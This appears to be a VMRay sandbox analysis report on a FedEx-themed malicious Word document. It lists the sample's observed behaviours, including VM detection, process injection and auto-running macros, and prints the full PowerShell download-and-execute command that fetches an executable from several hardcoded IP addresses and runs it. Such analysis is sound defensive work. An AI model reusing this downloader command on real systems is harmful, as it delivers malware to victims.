3692f99b...4ab2 | VTI
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Exploit, Dropper, Downloader

3692f99b76663e864b3fae22828ab01021dcc50c33f5ec041aa3b055478a4ab2 (SHA256)

receipt_FedEX_4028873.doc

Word Document

Created at 2018-12-06 22:25:00

Notifications (1/1)

The overall sleep time of all monitored processes was truncated from "45 seconds" to "30 seconds" to reveal dormant functionality.

Severity Category Operation Classification
5/5
Anti Analysis Tries to detect virtual machine -
  • Possibly trying to detect VM via rdtsc.
5/5
Injection Writes into the memory of another running process -
  • "c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe" modifies memory of "c:\windows\system32\svchost.exe"
4/5
Process Creates process -
  • Creates process "cmd /c powershell "'powershell ""function fmoke([string] $sut1){$tig1=1;try{(new-object system.net.webclient).downloadfile($sut1,''%tmp%\tmp6149.exe'');}catch{$tig1=0;}return $tig1;}$mok1=@(''193.187.172.11'',''46.173.218.240'',''193.187.172.42'',''46.173.218.83'');foreach ($liu in $mok1){if(fmoke(''http://''+$liu+''/uncle_sam.php'') -eq 1){break;} } start-process ''%tmp%\tmp6149.exe'';'""| out-file -encoding ascii -filepath %tmp%\tmp1971.bat; start-process '%tmp%\tmp1971.bat' -windowstyle hidden"".
  • Creates process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe".
  • Creates process "C:\Users\aETAdzjz\AppData\Local\Temp\tmp1971.bat".
  • Creates process "C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe".
4/5
Process Reads from memory of another process -
  • "c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe" reads from "C:\Windows\system32\svchost.exe".
4/5
OS Disables a crucial system service -
4/5
Process Executes encoded PowerShell script -
  • Executes encoded PowerShell script to possibly hide malicious payload.
4/5
Network Downloads data Downloader
4/5
YARA YARA match -
  • Rule "PowerShell_Download_Commands" from ruleset "Generic" has matched for "C:\Users\aETAdzjz\AppData\Local\Temp\tmp1971.bat"
  • Rule "VBA_Execution_Commands" from ruleset "Generic" has matched for "C:\Users\aETAdzjz\Desktop\receipt_FedEX_4028873.doc"
3/5
Network Checks external IP address -
  • Checks external IP by asking IP info service at "HTTP://icanhazip.com/".
3/5
Network Connects to remote host -
3/5
PE Executes dropped PE file -
2/5
File System Known suspicious file Exploit
2/5
Network Connects to HTTP server -
2/5
PE Drops PE file Dropper
2/5
VBA Macro Executes macro on specific worksheet event -
  • Executes macro automatically on target "auto" and event "open".
1/5
Process Creates system object -
  • Creates mutex with name "gcc-shmem-tdm2-mutex_global_static_shmem".
  • Creates mutex with name "gcc-shmem-tdm2-_pthread_cancelling_shmem".
1/5
VBA Macro Contains Office macro -
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image